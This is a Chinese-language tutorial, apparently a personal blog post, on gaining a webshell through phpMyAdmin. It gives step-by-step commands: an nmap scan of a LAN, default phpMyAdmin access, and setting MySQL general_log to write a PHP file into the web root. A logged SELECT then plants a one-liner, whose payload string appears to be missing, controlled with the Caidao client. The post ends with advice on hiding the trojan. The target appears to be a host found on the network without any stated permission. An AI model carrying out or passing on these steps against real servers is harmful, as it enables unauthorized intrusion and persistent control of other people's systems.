利用phpmyadmin获得webshell

这个是网上无意间找到的测试了一下竟然可用。。。嘿嘿嘿嘿嘿

1.利用Nmap扫描当前局域网网段上所有主机

nmap -sn -PE 192.168.1.0/24        ##扫描192.168.1网段上的所有主机

发现：

发现了不少于是，一个一个试试看打开了phpstudy没有，最终发现了一个：

竟然连探针都没删，暴露了物理地址！！！还可以试试phpinfo.php有没有删除。。还有进行报错什么的看看可不可以爆出物理路径：
利用初始进入phpmyadmin(大佬们勿喷，，，，内网渗透一点都不会。。。。)：

接下来开启general_log（好像是日志文件，在phpmyadmin中可以开启，并设置路径，这样我们查询的一切数据就都会被记录在这个日志中！！）

set global general_log='on';   ##开启

SET global general_log_file='C:/phpStudy/PHPTutorial/www/testtest.php';##设置日志文件路径，当然要设置在根目录下了0.0，会生成一个testtest.php的文件哦2333

因为开启了日志，所以我们的查询语句会被写入带日志里面（还是php文件哦），所以我们查询一句话

SELECT '';       #写入一句话

接下来用菜刀试试：

成功进入！！
一开始出错了，从新设置一次路径就行了！！！

接下来就是把服务关了（毕竟目的达成了233）

set global general_log=off;  ##关闭服务

当然你还可以把以前生成的删除了，把木马放入一个更深的目录，接下来就可以为所欲为了，小白教程哈，勿喷